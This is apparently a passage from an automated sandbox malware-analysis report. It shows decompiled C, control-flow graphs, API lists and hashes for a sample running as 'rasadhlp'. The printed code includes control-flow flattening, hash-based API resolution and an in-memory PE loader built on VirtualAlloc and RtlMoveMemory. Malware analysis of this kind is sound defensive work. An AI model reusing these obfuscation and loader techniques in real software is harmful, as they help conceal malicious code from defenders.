                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$Y4[0
                                                                                • API String ID: 2382770032-4131004879
                                                                                • Opcode ID: 901f3f3df0e6771c802e06df2c222d1fd8829cd6446574cfc36f66ae3e7a5bc9
                                                                                • Instruction ID: 827c36d81320fa2852553094f2cfa80cd2863c5697ece3554073732a51f53705
                                                                                • Opcode Fuzzy Hash: 901f3f3df0e6771c802e06df2c222d1fd8829cd6446574cfc36f66ae3e7a5bc9
                                                                                • Instruction Fuzzy Hash: 4661E631B043255BEB2AEF68FC9676A329DEB90B04F15042EF145DF251EA34CD058BA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00328400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 229 328400-3284df 230 3284e3-3284e9 229->230 231 3285c8-3285ce 230->231 232 3284ef 230->232 233 328630-328637 231->233 234 3285d0-3285d6 231->234 235 3284f5-3284fb 232->235 236 32866c-3286b4 call 32b6e0 232->236 237 328654-328667 233->237 238 328639-32864f call 323f00 call 323e60 233->238 239 3285b1-3285b7 234->239 240 3285d8-3285e0 234->240 241 32854a-328551 235->241 242 3284fd-328503 235->242 245 3285bd-3285c7 236->245 258 3286ba 236->258 237->230 238->237 239->230 239->245 248 3285e2-3285fa call 323f00 call 323e60 240->248 249 328600-328624 CreateFileW 240->249 246 328553-328569 call 323f00 call 323e60 241->246 247 32856e-328591 241->247 250 328543-328548 242->250 251 328505-32850b 242->251 246->247 272 328593-3285a9 call 323f00 call 323e60 247->272 273 3285ae 247->273 248->249 249->245 259 328626-32862b 249->259 250->230 251->239 257 328511-328518 251->257 263 328535-328541 257->263 264 32851a-328530 call 323f00 call 323e60 257->264 266 3286c4-3286d1 258->266 267 3286bc-3286be 258->267 259->230 263->230 264->263 267->245 267->266 272->273 273->239
                                                                                C-Code - Quality: 66%
                                                                                			E00328400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E0032B6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x32dec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E00323F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E00323E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x32dec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x32de3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E00323F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E00323E60(_t101, _t98, 0x20de7595, _t126);
									 *0x32de3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x32e1d4;
										if(_t93 == 0) {
											_t97 = E00323F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E00323E60(_t101, _t97, 0xa229df38, _t126);
											 *0x32e1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x32e3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E00323F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E00323E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x32e3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x32de04;
							if( *0x32de04 == 0) {
								_t95 = E00323F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x32de04 = E00323E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x00328400
                                                                                0x00328400
                                                                                0x00328406
                                                                                0x0032840e
                                                                                0x00328416
                                                                                0x0032841e
                                                                                0x00328426
                                                                                0x0032842b
                                                                                0x00328430
                                                                                0x00328438
                                                                                0x00328440
                                                                                0x00328445
                                                                                0x0032844a
                                                                                0x00328452
                                                                                0x0032845a
                                                                                0x00328462
                                                                                0x0032846a
                                                                                0x00328472
                                                                                0x0032847a
                                                                                0x00328482
                                                                                0x00328491
                                                                                0x00328496
                                                                                0x0032849a
                                                                                0x003284a2
                                                                                0x003284af
                                                                                0x003284b3
                                                                                0x003284bb
                                                                                0x003284c3
                                                                                0x003284cb
                                                                                0x003284cf
                                                                                0x003284d7
                                                                                0x003284df
                                                                                0x003284df
                                                                                0x003284e3
                                                                                0x003284e3
                                                                                0x003284e3
                                                                                0x003284e3
                                                                                0x003284e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003284ef
                                                                                0x0032866e
                                                                                0x00328676
                                                                                0x00328696
                                                                                0x0032869a
                                                                                0x003286a2
                                                                                0x003286a6
                                                                                0x003286aa
                                                                                0x003286b2
                                                                                0x003286b4
                                                                                0x00000000
                                                                                0x003286ba
                                                                                0x003286ba
                                                                                0x003286c5
                                                                                0x003286d1
                                                                                0x003286bc
                                                                                0x003286bc
                                                                                0x003286be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003286be
                                                                                0x003286ba
                                                                                0x003284f5
                                                                                0x003284fb
                                                                                0x0032854a
                                                                                0x0032854f
                                                                                0x00328551
                                                                                0x00328558
                                                                                0x0032855d
                                                                                0x00328564
                                                                                0x00328569
                                                                                0x00328569
                                                                                0x00328578
                                                                                0x0032857c
                                                                                0x0032857e
                                                                                0x00328589
                                                                                0x0032858f
                                                                                0x00328591
                                                                                0x00328598
                                                                                0x0032859d
                                                                                0x003285a4
                                                                                0x003285a9
                                                                                0x003285a9
                                                                                0x003285af
                                                                                0x00000000
                                                                                0x003284fd
                                                                                0x00328503
                                                                                0x00328543
                                                                                0x00000000
                                                                                0x00328505
                                                                                0x0032850b
                                                                                0x00000000
                                                                                0x00328511
                                                                                0x00328511
                                                                                0x00328518
                                                                                0x0032851f
                                                                                0x00328524
                                                                                0x0032852b
                                                                                0x00328530
                                                                                0x00328530
                                                                                0x0032853a
                                                                                0x0032853c
                                                                                0x00000000
                                                                                0x0032853c
                                                                                0x0032850b
                                                                                0x00328503
                                                                                0x003284fb
                                                                                0x00000000
                                                                                0x003284ef
                                                                                0x003285c8
                                                                                0x003285ce
                                                                                0x00328630
                                                                                0x00328635
                                                                                0x00328637
                                                                                0x0032863e
                                                                                0x00328643
                                                                                0x0032864a
                                                                                0x0032864f
                                                                                0x0032864f
                                                                                0x00328660
                                                                                0x00328662
                                                                                0x00000000
                                                                                0x003285d0
                                                                                0x003285d0
                                                                                0x003285d6
                                                                                0x00000000
                                                                                0x003285d8
                                                                                0x003285de
                                                                                0x003285e0
                                                                                0x003285e7
                                                                                0x003285ec
                                                                                0x003285fa
                                                                                0x003285fa
                                                                                0x0032861d
                                                                                0x0032861f
                                                                                0x00328621
                                                                                0x00328624
                                                                                0x00000000
                                                                                0x00328626
                                                                                0x00328626
                                                                                0x00000000
                                                                                0x00328626
                                                                                0x00328624
                                                                                0x003285d6
                                                                                0x00000000
                                                                                0x003285b1
                                                                                0x003285b1
                                                                                0x003285b1
                                                                                0x003285bd
                                                                                0x003285bd
                                                                                0x003285c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 0032861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: 22a79285d9e9cc99f34fff6600fc122b5a6e0eef6261ff77b87543bd9b8025d3
                                                                                • Instruction ID: e68fab6af7fe67c3410bf04ec3eda516f5ee4496031c7370611fd9af3b1473ee
                                                                                • Opcode Fuzzy Hash: 22a79285d9e9cc99f34fff6600fc122b5a6e0eef6261ff77b87543bd9b8025d3
                                                                                • Instruction Fuzzy Hash: 65611771A093219FC716DF68E44562FBBE5ABD0714F11881CF4999B290DB78DD098FC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00310D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 284 310d60-310dd5 call 310ed0 VirtualAlloc RtlMoveMemory 288 310ddb-310dde 284->288 289 310ebe-310ec4 284->289 288->289 290 310de4-310de6 288->290 290->289 291 310dec-310df0 290->291 291->289 293 310df6-310dfd 291->293 294 310e03-310e36 call 311140 RtlMoveMemory 293->294 295 310eaf-310ebb 293->295 294->289 299 310e3c-310e4a VirtualAlloc 294->299 300 310e89-310ea0 RtlFillMemory 299->300 301 310e4c-310e52 299->301 300->289 307 310ea2-310ea5 300->307 302 310e54-310e56 301->302 303 310e5a-310e68 301->303 302->303 303->289 304 310e6a-310e7d RtlMoveMemory 303->304 304->289 306 310e7f-310e83 304->306 306->289 308 310e85 306->308 307->289 309 310ea7-310ea9 307->309 308->300 309->294 309->295
                                                                                APIs
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00310F08
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00310F3E
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00310F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00310DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00310DC3
                                                                                  • Part of subcall function 00311140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00310EFD,00000000), ref: 00311155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00310E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00310E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00310E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00310E98
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429415643.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_310000_rasadhlp.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: f900eb0e888b60a0c8bdd2b779422d633d7d2deeebf80d494bc9143cef63afbd
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: D631CE72A043406BD22DDB61C844AEB73EAEBCC380F04092CB648D7351D6B5E8C087A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00327120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 310 327120 311 327125-32712a 310->311 312 327130 311->312 313 3271b4-3271b9 311->313 314 327233-327248 call 3234c0 312->314 315 327136-32713b 312->315 316 327207-32720c 313->316 317 3271bb 313->317 341 327265-327278 LoadLibraryW 314->341 342 32724a-327260 call 323f00 call 323e60 314->342 320 327190-327195 315->320 321 32713d 315->321 318 327227-32722c 316->318 319 32720e-327222 call 327080 316->319 323 3271ee-327202 call 327080 317->323 324 3271bd-3271c2 317->324 318->311 328 327232 318->328 319->311 320->318 327 32719b-3271af call 327080 320->327 329 32717a-32718e call 327080 321->329 330 32713f-327144 321->330 323->311 332 3271c4-3271c9 324->332 333 3271d5-3271e9 call 327080 324->333 327->311 329->311 339 327146-32714b 330->339 340 327164-327178 call 327080 330->340 332->318 343 3271cb-3271d0 332->343 333->311 339->318 351 327151-327162 call 327080 339->351 340->311 347 327295-3272a0 341->347 348 32727a-327290 call 323f00 call 323e60 341->348 342->341 343->311 362 3272a2-3272b8 call 323f00 call 323e60 347->362 363 3272bd-3272c5 347->363 348->347 351->311 362->363
                                                                                C-Code - Quality: 85%
                                                                                			E00327120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E003234C0(0x32d830);
							__eflags =  *0x32dd1c;
							if( *0x32dd1c == 0) {
								 *0x32dd1c = E00323E60(_t21, E00323F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x32e548; // 0x587dc0
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x32e494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E00323E60(_t21, E00323F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x32e494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x32df30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E00323E60(_t21, E00323F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x32df30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E00327080(_t21, 0x32d7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E00327080(_t21, 0x32d8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E00327080(_t21, 0x32d800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E00327080(_t21, 0x32d860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E00327080(_t21, 0x32d890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E00327080(_t21, 0x32d7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E00327080(_t21, 0x32d8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x00327120
                                                                                0x00327120
                                                                                0x00327120
                                                                                0x00327125
                                                                                0x00327125
                                                                                0x00327125
                                                                                0x00327125
                                                                                0x0032712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00327130
                                                                                0x0032723f
                                                                                0x00327246
                                                                                0x00327248
                                                                                0x00327260
                                                                                0x00327260
                                                                                0x00327266
                                                                                0x00327268
                                                                                0x0032726e
                                                                                0x00327271
                                                                                0x00327276
                                                                                0x00327278
                                                                                0x0032728b
                                                                                0x00327290
                                                                                0x00327290
                                                                                0x00327297
                                                                                0x00327299
                                                                                0x0032729e
                                                                                0x003272a0
                                                                                0x003272b3
                                                                                0x003272b8
                                                                                0x003272b8
                                                                                0x003272c5
                                                                                0x00327136
                                                                                0x00327136
                                                                                0x0032713b
                                                                                0x00327190
                                                                                0x00327195
                                                                                0x00000000
                                                                                0x0032719b
                                                                                0x003271a5
                                                                                0x003271aa
                                                                                0x00000000
                                                                                0x003271aa
                                                                                0x0032713d
                                                                                0x0032713d
                                                                                0x00327184
                                                                                0x00327189
                                                                                0x00000000
                                                                                0x0032713f
                                                                                0x00327144
                                                                                0x0032716e
                                                                                0x00327173
                                                                                0x00000000
                                                                                0x00327146
                                                                                0x00327146
                                                                                0x0032714b
                                                                                0x00000000
                                                                                0x00327151
                                                                                0x00327158
                                                                                0x0032715d
                                                                                0x00000000
                                                                                0x0032715d
                                                                                0x0032714b
                                                                                0x00327144
                                                                                0x0032713d
                                                                                0x0032713b
                                                                                0x00000000
                                                                                0x00327130
                                                                                0x003271b4
                                                                                0x003271b9
                                                                                0x00327207
                                                                                0x0032720c
                                                                                0x00000000
                                                                                0x0032720e
                                                                                0x00327218
                                                                                0x0032721d
                                                                                0x00000000
                                                                                0x0032721d
                                                                                0x003271bb
                                                                                0x003271bb
                                                                                0x003271f8
                                                                                0x003271fd
                                                                                0x00000000
                                                                                0x003271bd
                                                                                0x003271bd
                                                                                0x003271c2
                                                                                0x003271df
                                                                                0x003271e4
                                                                                0x00000000
                                                                                0x003271c4
                                                                                0x003271c4
                                                                                0x003271c9
                                                                                0x00000000
                                                                                0x003271cb
                                                                                0x003271cb
                                                                                0x00000000
                                                                                0x003271cb
                                                                                0x003271c9
                                                                                0x003271c2
                                                                                0x003271bb
                                                                                0x00000000
                                                                                0x00327227
                                                                                0x00327227
                                                                                0x00327227
                                                                                0x00327232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003268AC), ref: 00327266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Dry9$Dry9
                                                                                • API String ID: 1029625771-121480178
                                                                                • Opcode ID: a7654fac2e21e60f8127e9140b303a8c5c1e61c76af3e6157d0ccb9d585db983
                                                                                • Instruction ID: fa6928d01deae616f307c8ef0396edc35b828376e12a29918ea84dff4b1d294d
                                                                                • Opcode Fuzzy Hash: a7654fac2e21e60f8127e9140b303a8c5c1e61c76af3e6157d0ccb9d585db983
                                                                                • Instruction Fuzzy Hash: 8C31B530B0D23083DB276ABA78A176E11AEFFA0704F71446AF151CFB95DD2ADD124392
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003230A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 601 3230a0-3230b6 602 3230ba-3230bf 601->602 603 3230c0-3230c5 602->603 604 323201-323206 603->604 605 3230cb 603->605 608 323245-32324c 604->608 609 323208-32320d 604->609 606 3230d1-3230d6 605->606 607 3231ed-3231f1 605->607 614 3231da-3231e8 606->614 615 3230dc-3230e1 606->615 612 3232f6-323300 607->612 613 3231f7-3231fc 607->613 610 323269-323274 608->610 611 32324e-323264 call 323f00 call 323e60 608->611 616 323213-323218 609->616 617 3232ab-3232b3 609->617 638 323291-32329f RtlAllocateHeap 610->638 639 323276-32328c call 323f00 call 323e60 610->639 611->610 613->603 614->603 623 3231a0-3231a8 615->623 624 3230e7-3230ec 615->624 618 32321a-323228 call 323d00 616->618 619 32322d-323232 616->619 620 3232d3-3232f3 617->620 621 3232b5-3232cd call 323f00 call 323e60 617->621 618->602 619->603 629 323238-323242 619->629 620->612 621->620 627 3231aa-3231c2 call 323f00 call 323e60 623->627 628 3231c8-3231d5 623->628 624->619 625 3230f2-32319b 624->625 625->602 627->628 628->602 638->612 641 3232a1-3232a6 638->641 639->638 641->602
                                                                                C-Code - Quality: 71%
                                                                                			E003230A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x32e1cc;
										if(_t95 == 0) {
											_t95 = E00323E60(_t93, E00323F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x32e1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x32e494;
							if(_t62 == 0) {
								_t62 = E00323E60(_t93, E00323F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x32e494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x32dd18 == 0) {
								 *0x32dd18 = E00323E60(_t93, E00323F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x32e43c;
								if(_t116 == 0) {
									_t116 = E00323E60(_t93, E00323F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x32e43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E00323D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x003230a2
                                                                                0x003230a6
                                                                                0x003230ac
                                                                                0x003230b1
                                                                                0x003230b6
                                                                                0x003230ba
                                                                                0x003230ba
                                                                                0x003230c0
                                                                                0x003230c0
                                                                                0x003230c0
                                                                                0x003230c0
                                                                                0x003230c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003230cb
                                                                                0x003231f1
                                                                                0x003232f9
                                                                                0x00323300
                                                                                0x003231f7
                                                                                0x003231f7
                                                                                0x00000000
                                                                                0x003231f7
                                                                                0x003230d1
                                                                                0x003230d6
                                                                                0x003231e5
                                                                                0x00000000
                                                                                0x003230dc
                                                                                0x003230e1
                                                                                0x003231a0
                                                                                0x003231a8
                                                                                0x003231c0
                                                                                0x003231c2
                                                                                0x003231c2
                                                                                0x003231ce
                                                                                0x003231d0
                                                                                0x003230ba
                                                                                0x003230ba
                                                                                0x00000000
                                                                                0x003230ba
                                                                                0x003230e7
                                                                                0x003230ec
                                                                                0x00000000
                                                                                0x003230f2
                                                                                0x003230f2
                                                                                0x0032310d
                                                                                0x00323111
                                                                                0x0032311f
                                                                                0x00323123
                                                                                0x00323130
